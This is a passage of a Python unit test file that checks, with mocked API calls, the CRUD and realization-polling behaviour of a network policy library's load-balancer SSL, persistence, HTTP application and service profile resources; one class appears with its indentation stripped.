                client_ssl_profile_id=obj_id,
                name=name,
                description=description,
                tenant=TEST_TENANT)
            self.assert_called_with_def(update_call, expected_def)
class TestPolicyLBServerSSLProfileApi(test_resources.NsxPolicyLibTestCase):
    """Tests for the load-balancer server SSL profile policy resource.

    Mirrors the client SSL profile tests, using LBServerSslProfileDef.
    """

    def setUp(self, *args, **kwargs):
        """Point resourceApi at the server SSL profile resource."""
        super(TestPolicyLBServerSSLProfileApi, self).setUp()
        self.resourceApi = self.policy_lib.load_balancer.server_ssl_profile

    def test_create_with_id(self):
        """create_or_overwrite with an explicit id returns that id."""
        name = 'd1'
        description = 'desc'
        obj_id = '111'
        protocols = ['TLS_V1_1']
        with mock.patch.object(self.policy_api,
                               "create_or_update") as api_call:
            result = self.resourceApi.create_or_overwrite(
                name,
                server_ssl_profile_id=obj_id,
                description=description,
                protocols=protocols,
                tenant=TEST_TENANT)
            expected_def = lb_defs.LBServerSslProfileDef(
                server_ssl_profile_id=obj_id,
                name=name,
                description=description,
                protocols=protocols,
                tenant=TEST_TENANT)
            self.assert_called_with_def(api_call, expected_def)
            self.assertEqual(obj_id, result)

    def test_create_without_id(self):
        """create_or_overwrite without an id generates one (mock.ANY)."""
        name = 'd1'
        description = 'desc'
        with mock.patch.object(self.policy_api,
                               "create_or_update") as api_call:
            result = self.resourceApi.create_or_overwrite(
                name, description=description,
                tenant=TEST_TENANT)
            expected_def = lb_defs.LBServerSslProfileDef(
                server_ssl_profile_id=mock.ANY,
                name=name,
                description=description,
                tenant=TEST_TENANT)
            self.assert_called_with_def(api_call, expected_def)
            self.assertIsNotNone(result)

    def test_delete(self):
        """delete builds a def keyed only by profile id and tenant."""
        obj_id = '111'
        with mock.patch.object(self.policy_api, "delete") as api_call:
            self.resourceApi.delete(obj_id, tenant=TEST_TENANT)
            expected_def = lb_defs.LBServerSslProfileDef(
                server_ssl_profile_id=obj_id,
                tenant=TEST_TENANT)
            self.assert_called_with_def(api_call, expected_def)

    def test_get(self):
        """get forwards the id and returns the backend result."""
        obj_id = '111'
        with mock.patch.object(self.policy_api, "get",
                               return_value={'id': obj_id}) as api_call:
            result = self.resourceApi.get(obj_id, tenant=TEST_TENANT)
            expected_def = lb_defs.LBServerSslProfileDef(
                server_ssl_profile_id=obj_id,
                tenant=TEST_TENANT)
            self.assert_called_with_def(api_call, expected_def)
            self.assertEqual(obj_id, result['id'])

    def test_get_by_name(self):
        """get_by_name lists profiles and matches on display_name."""
        name = 'd1'
        with mock.patch.object(
            self.policy_api, "list",
            return_value={'results': [{'display_name': name}]}) as api_call:
            obj = self.resourceApi.get_by_name(name, tenant=TEST_TENANT)
            self.assertIsNotNone(obj)
            expected_def = lb_defs.LBServerSslProfileDef(
                tenant=TEST_TENANT)
            self.assert_called_with_def(api_call, expected_def)

    def test_list(self):
        """list with no results returns an empty list."""
        with mock.patch.object(self.policy_api, "list",
                               return_value={'results': []}) as api_call:
            result = self.resourceApi.list(tenant=TEST_TENANT)
            expected_def = lb_defs.LBServerSslProfileDef(
                tenant=TEST_TENANT)
            self.assert_called_with_def(api_call, expected_def)
            self.assertEqual([], result)

    def test_update(self):
        """update merges new name/description into the existing profile."""
        obj_id = '111'
        name = 'new name'
        description = 'new desc'
        with self.mock_get(obj_id, name), \
            self.mock_create_update() as update_call:
            self.resourceApi.update(obj_id,
                                    name=name,
                                    description=description,
                                    tenant=TEST_TENANT)
            expected_def = lb_defs.LBServerSslProfileDef(
                server_ssl_profile_id=obj_id,
                name=name,
                description=description,
                tenant=TEST_TENANT)
            self.assert_called_with_def(update_call, expected_def)
class TestPolicyLBPersistenceProfile(
    test_resources.NsxPolicyLibTestCase):
    """Tests for the generic LB persistence-profile policy resource.

    Verifies CRUD-style calls translate into the expected entry defs, and
    that realization polling succeeds/fails based on realization state.
    """

    def setUp(self, *args, **kwargs):
        super(TestPolicyLBPersistenceProfile, self).setUp()
        self.resourceApi = (
            self.policy_lib.load_balancer.lb_persistence_profile)

    def test_delete(self):
        """delete builds an entry def keyed by profile id and tenant."""
        profile_id = '111'
        with mock.patch.object(self.policy_api, "delete") as delete_call:
            self.resourceApi.delete(profile_id, tenant=TEST_TENANT)
            expected_def = self.resourceApi.entry_def(
                persistence_profile_id=profile_id,
                tenant=TEST_TENANT)
            self.assert_called_with_def(delete_call, expected_def)

    def test_get(self):
        """get forwards the id and returns the backend payload."""
        profile_id = '111'
        with mock.patch.object(self.policy_api, "get",
                               return_value={'id': profile_id}) as get_call:
            fetched = self.resourceApi.get(profile_id, tenant=TEST_TENANT)
            expected_def = self.resourceApi.entry_def(
                persistence_profile_id=profile_id,
                tenant=TEST_TENANT)
            self.assert_called_with_def(get_call, expected_def)
            self.assertEqual(profile_id, fetched['id'])

    def test_get_by_name(self):
        """get_by_name lists profiles and matches on display_name."""
        profile_name = 'd1'
        listing = {'results': [{'display_name': profile_name}]}
        with mock.patch.object(self.policy_api, "list",
                               return_value=listing) as list_call:
            found = self.resourceApi.get_by_name(profile_name,
                                                 tenant=TEST_TENANT)
            self.assertIsNotNone(found)
            expected_def = self.resourceApi.entry_def(tenant=TEST_TENANT)
            self.assert_called_with_def(list_call, expected_def)

    def test_list(self):
        """list with no backend results yields an empty list."""
        with mock.patch.object(self.policy_api, "list",
                               return_value={'results': []}) as list_call:
            listed = self.resourceApi.list(tenant=TEST_TENANT)
            expected_def = self.resourceApi.entry_def(tenant=TEST_TENANT)
            self.assert_called_with_def(list_call, expected_def)
            self.assertEqual([], listed)

    def test_wait_until_realized_fail(self):
        """Polling an unrealized profile times out with an error."""
        pers_id = 'test_pers'
        realization_info = {
            'state': constants.STATE_UNREALIZED,
            'realization_specific_identifier': pers_id}
        with mock.patch.object(self.resourceApi, "_get_realization_info",
                               return_value=realization_info):
            self.assertRaises(nsxlib_exc.RealizationTimeoutError,
                              self.resourceApi.wait_until_realized,
                              pers_id, max_attempts=5, sleep=0.1,
                              tenant=TEST_TENANT)

    def test_wait_until_realized_succeed(self):
        """Polling a realized profile returns its realization info."""
        pers_id = 'test_pers'
        realization_info = {
            'state': constants.STATE_REALIZED,
            'realization_specific_identifier': pers_id,
            'entity_type': 'LbPersistenceProfileDto'}
        with mock.patch.object(self.resourceApi, "_get_realization_info",
                               return_value=realization_info):
            observed = self.resourceApi.wait_until_realized(
                pers_id, entity_type='LbPersistenceProfileDto', max_attempts=5,
                sleep=0.1, tenant=TEST_TENANT)
            self.assertEqual(realization_info, observed)
class TestPolicyLBCookiePersistenceProfile(
    test_resources.NsxPolicyLibTestCase):
    """Tests for the LB cookie persistence-profile policy resource.

    Covers create/update with the full set of cookie attributes, plus
    list/get_by_name filtering by resource_type.
    """

    def setUp(self, *args, **kwargs):
        """Point resourceApi at the cookie persistence profile resource."""
        super(TestPolicyLBCookiePersistenceProfile, self).setUp()
        self.resourceApi = (
            self.policy_lib.load_balancer.lb_cookie_persistence_profile)

    def test_create_with_id(self):
        """create_or_overwrite passes all cookie attrs into the def."""
        name = 'd1'
        description = 'desc'
        obj_id = '111'
        cookie_garble = 'test_garble'
        cookie_name = 'test_name'
        cookie_mode = 'INSERT'
        cookie_path = 'path'
        cookie_time = 'time'
        persistence_shared = False
        with self.mock_create_update() as api_call:
            result = self.resourceApi.create_or_overwrite(
                name,
                persistence_profile_id=obj_id,
                description=description,
                cookie_name=cookie_name,
                cookie_garble=cookie_garble,
                cookie_mode=cookie_mode,
                cookie_path=cookie_path,
                cookie_time=cookie_time,
                persistence_shared=persistence_shared,
                tenant=TEST_TENANT)
            expected_def = (
                lb_defs.LBCookiePersistenceProfileDef(
                    persistence_profile_id=obj_id,
                    name=name,
                    description=description,
                    cookie_name=cookie_name,
                    cookie_garble=cookie_garble,
                    cookie_mode=cookie_mode,
                    cookie_path=cookie_path,
                    cookie_time=cookie_time,
                    persistence_shared=persistence_shared,
                    tenant=TEST_TENANT))
            self.assert_called_with_def(api_call, expected_def)
            self.assertEqual(obj_id, result)

    def test_create_without_id(self):
        """create_or_overwrite without an id generates one (mock.ANY)."""
        name = 'd1'
        description = 'desc'
        with self.mock_create_update() as api_call:
            result = self.resourceApi.create_or_overwrite(
                name, description=description,
                tenant=TEST_TENANT)
            expected_def = (
                lb_defs.LBCookiePersistenceProfileDef(
                    persistence_profile_id=mock.ANY,
                    name=name,
                    description=description,
                    tenant=TEST_TENANT))
            self.assert_called_with_def(api_call, expected_def)
            self.assertIsNotNone(result)

    def test_delete(self):
        """delete builds a def keyed only by profile id and tenant."""
        obj_id = '111'
        with mock.patch.object(self.policy_api, "delete") as api_call:
            self.resourceApi.delete(obj_id, tenant=TEST_TENANT)
            expected_def = (
                lb_defs.LBCookiePersistenceProfileDef(
                    persistence_profile_id=obj_id,
                    tenant=TEST_TENANT))
            self.assert_called_with_def(api_call, expected_def)

    def test_get(self):
        """get forwards the id and returns the backend result."""
        obj_id = '111'
        with mock.patch.object(self.policy_api, "get",
                               return_value={'id': obj_id}) as api_call:
            result = self.resourceApi.get(obj_id, tenant=TEST_TENANT)
            expected_def = (
                lb_defs.LBCookiePersistenceProfileDef(
                    persistence_profile_id=obj_id,
                    tenant=TEST_TENANT))
            self.assert_called_with_def(api_call, expected_def)
            self.assertEqual(obj_id, result['id'])

    def test_get_by_name(self):
        """get_by_name matches on display_name for the cookie type."""
        name = 'd1'
        with mock.patch.object(
            self.policy_api, "list",
            return_value={'results': [
                {'resource_type': self.resourceApi.entry_def.resource_type(),
                 'display_name': name}]}) as api_call:
            obj = self.resourceApi.get_by_name(name, tenant=TEST_TENANT)
            self.assertIsNotNone(obj)
            expected_def = (
                lb_defs.LBCookiePersistenceProfileDef(
                    tenant=TEST_TENANT))
            self.assert_called_with_def(api_call, expected_def)

    def test_list(self):
        """list filters out entries whose resource_type doesn't match."""
        with mock.patch.object(
            self.policy_api, "list",
            return_value={'results': [
                {'resource_type': self.resourceApi.entry_def.resource_type(),
                 'display_name': 'profile1'},
                {'resource_type': 'wrong_type',
                 'display_name': 'profile2'}]}) as api_call:
            result = self.resourceApi.list(tenant=TEST_TENANT)
            expected_def = (
                lb_defs.LBCookiePersistenceProfileDef(
                    tenant=TEST_TENANT))
            self.assert_called_with_def(api_call, expected_def)
            # Only the matching-resource-type entry should survive.
            self.assertEqual(1, len(result))

    def test_update(self):
        """update passes the full set of cookie attrs into the def."""
        obj_id = '111'
        name = 'new name'
        description = 'new desc'
        cookie_garble = 'test_garble'
        cookie_name = 'test_name'
        cookie_mode = 'INSERT'
        cookie_path = 'path'
        cookie_time = 'time'
        persistence_shared = False
        with self.mock_get(obj_id, name), \
            self.mock_create_update() as update_call:
            self.resourceApi.update(obj_id,
                                    name=name,
                                    description=description,
                                    cookie_name=cookie_name,
                                    cookie_garble=cookie_garble,
                                    cookie_mode=cookie_mode,
                                    cookie_path=cookie_path,
                                    cookie_time=cookie_time,
                                    persistence_shared=persistence_shared,
                                    tenant=TEST_TENANT)
            expected_def = (
                lb_defs.LBCookiePersistenceProfileDef(
                    persistence_profile_id=obj_id,
                    name=name,
                    description=description,
                    cookie_name=cookie_name,
                    cookie_garble=cookie_garble,
                    cookie_mode=cookie_mode,
                    cookie_path=cookie_path,
                    cookie_time=cookie_time,
                    persistence_shared=persistence_shared,
                    tenant=TEST_TENANT))
            self.assert_called_with_def(update_call, expected_def)
class TestPolicyLBSourceIpProfileApi(test_resources.NsxPolicyLibTestCase):
def setUp(self, *args, **kwargs):
super(TestPolicyLBSourceIpProfileApi, self).setUp()
self.resourceApi = (
self.policy_lib.load_balancer.lb_source_ip_persistence_profile)
def test_create_with_id(self):
name = 'd1'
description = 'desc'
obj_id = '111'
ha = 'ha'
persistence_shared = True
purge = 'purge'
timeout = 100
with mock.patch.object(self.policy_api,
"create_or_update") as api_call:
result = self.resourceApi.create_or_overwrite(
name,
persistence_profile_id=obj_id,
description=description,
ha_persistence_mirroring_enabled=ha,
persistence_shared=persistence_shared,
purge=purge,
timeout=timeout,
tenant=TEST_TENANT)
expected_def = (
lb_defs.LBSourceIpPersistenceProfileDef(
persistence_profile_id=obj_id,
name=name,
description=description,
ha_persistence_mirroring_enabled=ha,
persistence_shared=persistence_shared,
purge=purge,
timeout=timeout,
tenant=TEST_TENANT))
self.assert_called_with_def(api_call, expected_def)
self.assertEqual(obj_id, result)
def test_create_without_id(self):
name = 'd1'
description = 'desc'
with mock.patch.object(self.policy_api,
"create_or_update") as api_call:
result = self.resourceApi.create_or_overwrite(
name, description=description,
tenant=TEST_TENANT)
expected_def = (
lb_defs.LBSourceIpPersistenceProfileDef(
persistence_profile_id=mock.ANY,
name=name,
description=description,
tenant=TEST_TENANT))
self.assert_called_with_def(api_call, expected_def)
self.assertIsNotNone(result)
def test_delete(self):
obj_id = '111'
with mock.patch.object(self.policy_api, "delete") as api_call:
self.resourceApi.delete(obj_id, tenant=TEST_TENANT)
expected_def = (
lb_defs.LBSourceIpPersistenceProfileDef(
persistence_profile_id=obj_id,
tenant=TEST_TENANT))
self.assert_called_with_def(api_call, expected_def)
def test_get(self):
obj_id = '111'
with mock.patch.object(self.policy_api, "get",
return_value={'id': obj_id}) as api_call:
result = self.resourceApi.get(obj_id, tenant=TEST_TENANT)
expected_def = (
lb_defs.LBSourceIpPersistenceProfileDef(
persistence_profile_id=obj_id,
tenant=TEST_TENANT))
self.assert_called_with_def(api_call, expected_def)
self.assertEqual(obj_id, result['id'])
def test_get_by_name(self):
name = 'd1'
with mock.patch.object(
self.policy_api, "list",
return_value={'results': [
{'resource_type': self.resourceApi.entry_def.resource_type(),
'display_name': name}]}) as api_call:
obj = self.resourceApi.get_by_name(name, tenant=TEST_TENANT)
self.assertIsNotNone(obj)
expected_def = (
lb_defs.LBSourceIpPersistenceProfileDef(
tenant=TEST_TENANT))
self.assert_called_with_def(api_call, expected_def)
def test_list(self):
profiles = [{'resource_type': 'LBSourceIpPersistenceProfile',
'id': 'default-source-ip-lb-persistence-profile',
'display_name': 'default-source-ip-profile'}]
with mock.patch.object(self.policy_api, "list",
return_value={'results': profiles}) as api_call:
result = self.resourceApi.list(tenant=TEST_TENANT)
expected_def = (
lb_defs.LBSourceIpPersistenceProfileDef(
tenant=TEST_TENANT))
self.assert_called_with_def(api_call, expected_def)
self.assertEqual(profiles, result)
def test_list_different_type(self):
profiles = [{'resource_type': 'LBSourceCookiePersistenceProfile',
'id': 'default-source-ip-lb-persistence-profile',
'display_name': 'default-source-ip-profile'}]
with mock.patch.object(self.policy_api, "list",
return_value={'results': profiles}) as api_call:
result = self.resourceApi.list(tenant=TEST_TENANT)
expected_def = (
lb_defs.LBSourceIpPersistenceProfileDef(
tenant=TEST_TENANT))
self.assert_called_with_def(api_call, expected_def)
self.assertEqual([], result)
def test_list_empty(self):
with mock.patch.object(self.policy_api, "list",
return_value={'results': []}) as api_call:
result = self.resourceApi.list(tenant=TEST_TENANT)
expected_def = (
lb_defs.LBSourceIpPersistenceProfileDef(
tenant=TEST_TENANT))
self.assert_called_with_def(api_call, expected_def)
self.assertEqual([], result)
def test_update(self):
obj_id = '111'
name = 'new name'
description = 'new desc'
ha = False
persistence_shared = False
purge = 'no purge'
timeout = 101
with self.mock_get(obj_id, name), \
self.mock_create_update() as update_call:
self.resourceApi.update(obj_id,
name=name,
description=description,
ha_persistence_mirroring_enabled=ha,
persistence_shared=persistence_shared,
purge=purge,
timeout=timeout,
tenant=TEST_TENANT)
expected_def = (
lb_defs.LBSourceIpPersistenceProfileDef(
persistence_profile_id=obj_id,
name=name,
description=description,
ha_persistence_mirroring_enabled=ha,
persistence_shared=persistence_shared,
purge=purge,
timeout=timeout,
tenant=TEST_TENANT))
self.assert_called_with_def(update_call, expected_def)
class TestPolicyLBApplicationProfile(test_resources.NsxPolicyLibTestCase):
    """Tests for the LB HTTP application profile policy resource API.

    Backend calls are mocked; each test verifies the resource API
    translates its arguments into the expected LBHttpProfileDef.
    """

    def setUp(self, *args, **kwargs):
        super(TestPolicyLBApplicationProfile, self).setUp()
        self.resourceApi = self.policy_lib.load_balancer.lb_http_profile

    def _assert_dict_subset(self, subset, dictionary):
        # Replacement for unittest's assertDictContainsSubset, which is
        # deprecated since Python 3.2 and removed in Python 3.12: every
        # key/value pair of 'subset' must appear unchanged in 'dictionary'.
        self.assertEqual(
            subset, {k: v for k, v in dictionary.items() if k in subset})

    def test_create_with_id(self):
        """create_or_overwrite with an explicit ID forwards all args."""
        name = 'd1'
        description = 'desc'
        obj_id = '111'
        http_redirect_to_https = False
        http_redirect_to = "sample-url"
        idle_timeout = 100
        ntlm = False
        request_body_size = 1025
        request_header_size = 10
        response_header_size = 10
        response_timeout = 10
        x_forwarded_for = 'INSERT'
        with mock.patch.object(self.policy_api,
                               "create_or_update") as api_call:
            result = self.resourceApi.create_or_overwrite(
                name,
                lb_app_profile_id=obj_id,
                description=description,
                http_redirect_to_https=http_redirect_to_https,
                http_redirect_to=http_redirect_to,
                idle_timeout=idle_timeout,
                ntlm=ntlm,
                request_body_size=request_body_size,
                request_header_size=request_header_size,
                response_header_size=response_header_size,
                response_timeout=response_timeout,
                x_forwarded_for=x_forwarded_for,
                tenant=TEST_TENANT)
            expected_def = (
                lb_defs.LBHttpProfileDef(
                    lb_app_profile_id=obj_id,
                    name=name,
                    description=description,
                    http_redirect_to_https=http_redirect_to_https,
                    http_redirect_to=http_redirect_to,
                    idle_timeout=idle_timeout,
                    ntlm=ntlm,
                    request_body_size=request_body_size,
                    request_header_size=request_header_size,
                    response_header_size=response_header_size,
                    response_timeout=response_timeout,
                    x_forwarded_for=x_forwarded_for,
                    tenant=TEST_TENANT))
            self.assert_called_with_def(api_call, expected_def)
            self.assertEqual(obj_id, result)

    def test_fast_tcp_profile_def(self):
        """LBFastTcpProfile serializes its attributes into the body."""
        obj_dict = {'close_timeout': 8,
                    'ha_flow_mirroring_enabled': False,
                    'idle_timeout': 100}
        fast_tcp_profile_def = lb_defs.LBFastTcpProfile(**obj_dict)
        self._assert_dict_subset(obj_dict,
                                 fast_tcp_profile_def.get_obj_dict())

    def test_fast_udp_profile_def(self):
        """LBFastUdpProfile serializes its attributes into the body."""
        obj_dict = {'flow_mirroring_enabled': False,
                    'idle_timeout': 100}
        fast_udp_profile_def = lb_defs.LBFastUdpProfile(**obj_dict)
        self._assert_dict_subset(obj_dict,
                                 fast_udp_profile_def.get_obj_dict())

    def test_http_profile_def(self):
        """LBHttpProfileDef serializes its attributes into the body."""
        obj_dict = {'http_redirect_to_https': False,
                    'http_redirect_to': "sample-url",
                    'idle_timeout': 100,
                    'ntlm': False,
                    'request_body_size': 1025,
                    'request_header_size': 10,
                    'response_header_size': 10,
                    'response_timeout': 10,
                    'x_forwarded_for': 'INSERT'}
        http_profile_def = lb_defs.LBHttpProfileDef(**obj_dict)
        self._assert_dict_subset(obj_dict,
                                 http_profile_def.get_obj_dict())

    def test_create_without_id(self):
        """Creating without an explicit ID auto-generates one."""
        name = 'd1'
        description = 'desc'
        with mock.patch.object(self.policy_api,
                               "create_or_update") as api_call:
            result = self.resourceApi.create_or_overwrite(
                name, description=description,
                tenant=TEST_TENANT)
            expected_def = (
                lb_defs.LBHttpProfileDef(
                    lb_app_profile_id=mock.ANY,
                    name=name,
                    description=description,
                    tenant=TEST_TENANT))
            self.assert_called_with_def(api_call, expected_def)
            self.assertIsNotNone(result)

    def test_delete(self):
        """Delete passes the profile ID through to the policy API."""
        obj_id = '111'
        with mock.patch.object(self.policy_api, "delete") as api_call:
            self.resourceApi.delete(obj_id, tenant=TEST_TENANT)
            expected_def = (
                lb_defs.LBHttpProfileDef(
                    lb_app_profile_id=obj_id,
                    tenant=TEST_TENANT))
            self.assert_called_with_def(api_call, expected_def)

    def test_get(self):
        """Get builds a def keyed by the ID and returns the payload."""
        obj_id = '111'
        with mock.patch.object(self.policy_api, "get",
                               return_value={'id': obj_id}) as api_call:
            result = self.resourceApi.get(obj_id, tenant=TEST_TENANT)
            expected_def = (
                lb_defs.LBHttpProfileDef(
                    lb_app_profile_id=obj_id,
                    tenant=TEST_TENANT))
            self.assert_called_with_def(api_call, expected_def)
            self.assertEqual(obj_id, result['id'])

    def test_get_by_name(self):
        """get_by_name lists profiles and matches on display_name."""
        name = 'd1'
        with mock.patch.object(
                self.policy_api, "list",
                return_value={'results': [{'display_name': name}]}) as api_call:
            obj = self.resourceApi.get_by_name(name, tenant=TEST_TENANT)
            self.assertIsNotNone(obj)
            expected_def = (
                lb_defs.LBHttpProfileDef(tenant=TEST_TENANT))
            self.assert_called_with_def(api_call, expected_def)

    def test_list(self):
        """An empty backend listing yields an empty result."""
        with mock.patch.object(self.policy_api, "list",
                               return_value={'results': []}) as api_call:
            result = self.resourceApi.list(tenant=TEST_TENANT)
            expected_def = (
                lb_defs.LBHttpProfileDef(tenant=TEST_TENANT))
            self.assert_called_with_def(api_call, expected_def)
            self.assertEqual([], result)

    def test_update(self):
        """Update forwards changed name/description into the def."""
        obj_id = '111'
        name = 'new name'
        description = 'new desc'
        with self.mock_get(obj_id, name), \
            self.mock_create_update() as update_call:
            self.resourceApi.update(obj_id,
                                    name=name,
                                    description=description,
                                    tenant=TEST_TENANT)
            expected_def = (
                lb_defs.LBHttpProfileDef(
                    lb_app_profile_id=obj_id,
                    name=name,
                    description=description,
                    tenant=TEST_TENANT))
            self.assert_called_with_def(update_call, expected_def)
class TestPolicyLBService(test_resources.NsxPolicyLibTestCase):
    """Tests for the LB service policy resource API.

    Backend calls are mocked; each test asserts the resource API builds
    the expected LBServiceDef (or status/statistics/usage def).
    """

    def setUp(self, *args, **kwargs):
        super(TestPolicyLBService, self).setUp()
        self.resourceApi = self.policy_lib.load_balancer.lb_service

    def test_create_with_id(self):
        """create_or_overwrite with an explicit ID forwards all args."""
        name = 'd1'
        description = 'desc'
        obj_id = '111'
        size = 'SMALL'
        connectivity_path = 'path'
        relax_scale_validation = True
        with self.mock_create_update() as api_call:
            result = self.resourceApi.create_or_overwrite(
                name,
                lb_service_id=obj_id,
                description=description,
                size=size,
                connectivity_path=connectivity_path,
                relax_scale_validation=relax_scale_validation,
                tenant=TEST_TENANT)
            expected_def = (
                lb_defs.LBServiceDef(
                    nsx_version=self.policy_lib.get_version(),
                    lb_service_id=obj_id,
                    name=name,
                    description=description,
                    size=size,
                    connectivity_path=connectivity_path,
                    relax_scale_validation=relax_scale_validation,
                    tenant=TEST_TENANT))
            self.assert_called_with_def(api_call, expected_def)
            self.assertEqual(obj_id, result)

    def test_create_without_id(self):
        """Creating without an explicit ID auto-generates one."""
        name = 'd1'
        description = 'desc'
        with self.mock_create_update() as api_call:
            result = self.resourceApi.create_or_overwrite(
                name, description=description,
                tenant=TEST_TENANT)
            expected_def = (
                lb_defs.LBServiceDef(lb_service_id=mock.ANY,
                                     name=name,
                                     description=description,
                                     tenant=TEST_TENANT))
            self.assert_called_with_def(api_call, expected_def)
            self.assertIsNotNone(result)

    def test_create_with_unsupported_attribute(self):
        """On an old NSX version an unsupported attribute is dropped."""
        name = 'd1'
        description = 'desc'
        relax_scale_validation = True
        # Force version '0.0.0' so relax_scale_validation is not
        # included in the def sent to the backend.
        with self.mock_create_update() as api_call, \
            mock.patch.object(self.resourceApi, 'version', '0.0.0'):
            result = self.resourceApi.create_or_overwrite(
                name, description=description,
                relax_scale_validation=relax_scale_validation,
                tenant=TEST_TENANT)
            expected_def = (
                lb_defs.LBServiceDef(lb_service_id=mock.ANY,
                                     name=name,
                                     description=description,
                                     tenant=TEST_TENANT))
            self.assert_called_with_def(api_call, expected_def)
            self.assertIsNotNone(result)

    def test_delete(self):
        """Delete passes the service ID through to the policy API."""
        obj_id = '111'
        with mock.patch.object(self.policy_api, "delete") as api_call:
            self.resourceApi.delete(obj_id, tenant=TEST_TENANT)
            expected_def = lb_defs.LBServiceDef(
                lb_service_id=obj_id,
                tenant=TEST_TENANT)
            self.assert_called_with_def(api_call, expected_def)

    def test_get(self):
        """Get builds a def keyed by the ID and returns the payload."""
        obj_id = '111'
        with mock.patch.object(self.policy_api, "get",
                               return_value={'id': obj_id}) as api_call:
            result = self.resourceApi.get(obj_id, tenant=TEST_TENANT)
            expected_def = lb_defs.LBServiceDef(
                lb_service_id=obj_id,
                tenant=TEST_TENANT)
            self.assert_called_with_def(api_call, expected_def)
            self.assertEqual(obj_id, result['id'])

    def test_get_by_name(self):
        """get_by_name lists services and matches on display_name."""
        name = 'd1'
        with mock.patch.object(
                self.policy_api, "list",
                return_value={'results': [{'display_name': name}]}) as api_call:
            obj = self.resourceApi.get_by_name(name, tenant=TEST_TENANT)
            self.assertIsNotNone(obj)
            expected_def = lb_defs.LBServiceDef(
                tenant=TEST_TENANT)
            self.assert_called_with_def(api_call, expected_def)

    def _test_list(self, silent=False, silent_if_empty=False):
        # Helper: list one service and verify the silent flags are
        # accepted without altering the result.
        s1 = {'id': 'xxx', 'display_name': 'yyy'}
        with mock.patch.object(self.policy_api, "list",
                               return_value={'results': [s1]}) as api_call:
            result = self.resourceApi.list(tenant=TEST_TENANT, silent=silent,
                                           silent_if_empty=silent_if_empty)
            expected_def = lb_defs.LBServiceDef(
                tenant=TEST_TENANT)
            self.assert_called_with_def(api_call, expected_def)
            self.assertEqual([s1], result)

    def test_list(self):
        """Plain listing."""
        self._test_list()

    def test_list_total_silence(self):
        """Listing with silent=True."""
        self._test_list(silent=True)

    def test_list_silent_if_empty(self):
        """Listing with silent_if_empty=True."""
        self._test_list(silent_if_empty=True)

    def test_update(self):
        """Update forwards all changed attributes into the def."""
        obj_id = '111'
        name = 'new name'
        description = 'new desc'
        size = 'SMALL'
        connectivity_path = 'path'
        relax_scale_validation = True
        with self.mock_get(obj_id, name), \
            self.mock_create_update() as update_call:
            self.resourceApi.update(
                obj_id,
                name=name,
                description=description,
                tenant=TEST_TENANT,
                size=size,
                connectivity_path=connectivity_path,
                relax_scale_validation=relax_scale_validation)
            expected_def = lb_defs.LBServiceDef(
                nsx_version=self.policy_lib.get_version(),
                lb_service_id=obj_id,
                name=name,
                description=description,
                tenant=TEST_TENANT,
                size=size,
                connectivity_path=connectivity_path,
                relax_scale_validation=relax_scale_validation)
            self.assert_called_with_def(update_call, expected_def)

    def test_update_customized(self):
        """update_customized applies the callback to the GET body."""
        obj_id = '111'
        name = 'name'
        tags = [{'tag': '1', 'scope': '2'}]

        # Callback mutates the fetched body before it is PUT back.
        def update_callback(body):
            body['tags'] = tags

        with self.mock_get(obj_id, name), \
            mock.patch.object(self.policy_api.client, "update") as update_call:
            self.resourceApi.update_customized(
                obj_id, update_callback)

            update_call.assert_called_once_with(
                'infra/lb-services/%s' % obj_id,
                {'id': obj_id, 'display_name': name,
                 'resource_type': 'LBService',
                 'tags': tags})

    def test_get_status(self):
        """get_status issues a GET with an LBServiceStatusDef."""
        obj_id = '111'
        with mock.patch.object(self.policy_api, "get") as api_call:
            self.resourceApi.get_status(obj_id, tenant=TEST_TENANT)
            expected_def = lb_defs.LBServiceStatusDef(
                lb_service_id=obj_id,
                tenant=TEST_TENANT)
            self.assert_called_with_def(api_call, expected_def)

    def test_get_statistics(self):
        """Non-realtime statistics use the plain statistics path."""
        obj_id = '111'
        with mock.patch.object(self.policy_api, "get") as api_call:
            self.resourceApi.get_statistics(obj_id, tenant=TEST_TENANT)
            expected_def = lb_defs.LBServiceStatisticsDef(
                lb_service_id=obj_id,
                realtime=False,
                tenant=TEST_TENANT)
            self.assert_called_with_def(api_call, expected_def)
            # NOTE(review): compares the literal pattern with the def's
            # path_pattern attribute; relies on LBServiceStatisticsDef.
            self.assertEqual('%s/lb-services/%s/statistics/',
                             expected_def.path_pattern)

    def test_get_statistics_realtime(self):
        """Realtime statistics add the source=realtime query."""
        obj_id = '111'
        with mock.patch.object(self.policy_api, "get") as api_call:
            self.resourceApi.get_statistics(obj_id, realtime=True,
                                            tenant=TEST_TENANT)
            expected_def = lb_defs.LBServiceStatisticsDef(
                lb_service_id=obj_id,
                realtime=True,
                tenant=TEST_TENANT)
            self.assert_called_with_def(api_call, expected_def)
            self.assertEqual('%s/lb-services/%s/statistics?source=realtime',
                             expected_def.path_pattern)

    def test_get_virtual_server_status(self):
        """Virtual-server status uses an LBVirtualServerStatusDef."""
        obj_id = '111'
        vs_id = '222'
        with mock.patch.object(self.policy_api, "get") as api_call:
            self.resourceApi.get_virtual_server_status(
                obj_id, vs_id, tenant=TEST_TENANT)
            expected_def = lb_defs.LBVirtualServerStatusDef(
                lb_service_id=obj_id,
                tenant=TEST_TENANT)
            self.assert_called_with_def(api_call, expected_def)

    def test_get_usage(self):
        """Realtime usage adds the source=realtime query to the path."""
        lbs_id = 'test_vs'
        with mock.patch.object(self.policy_api, "get") as api_call:
            self.resourceApi.get_usage(
                lbs_id, realtime=True, tenant=TEST_TENANT)
            expected_def = lb_defs.LBServiceUsageDef(
                lb_service_id=lbs_id,
                realtime=True,
                tenant=TEST_TENANT)
            expected_path = '%s/lb-services/%s/service-usage?source=realtime'
            self.assert_called_with_def(api_call, expected_def)
            self.assertEqual(expected_def.path_pattern, expected_path)

    def test_wait_until_realized_fail(self):
        """An UNREALIZED state eventually raises a timeout error."""
        lbs_id = 'test_lbs'
        info = {'state': constants.STATE_UNREALIZED,
                'realization_specific_identifier': lbs_id,
                'entity_type': 'LbServiceDto'}
        with mock.patch.object(self.resourceApi, "_get_realization_info",
                               return_value=info):
            self.assertRaises(nsxlib_exc.RealizationTimeoutError,
                              self.resourceApi.wait_until_realized,
                              lbs_id, max_attempts=5, sleep=0.1,
                              tenant=TEST_TENANT)

    def test_wait_until_realized_error(self):
        """An ERROR state raises with codes and messages from the alarm."""
        lbs_id = 'test_lbs'
        error_code = 23500
        related_error_code = 23707
        error_msg = 'Found errors in the request.'
        related_error_msg = 'Exceed maximum number of load balancer.'
        info = {'state': constants.STATE_ERROR,
